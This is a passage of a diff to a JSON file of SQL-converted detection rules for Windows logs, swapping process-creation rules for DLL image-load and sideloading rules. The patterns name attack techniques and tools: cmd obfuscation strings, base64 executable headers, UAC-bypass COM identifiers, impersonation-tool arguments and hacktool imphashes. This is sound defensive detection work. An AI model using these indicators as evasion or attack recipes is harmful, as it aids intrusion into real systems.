"frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. John, OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "status": "test", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "status": "experimental", + 
"description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR 
CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - 
"level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' 
ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', 
'23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', 
'5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE 
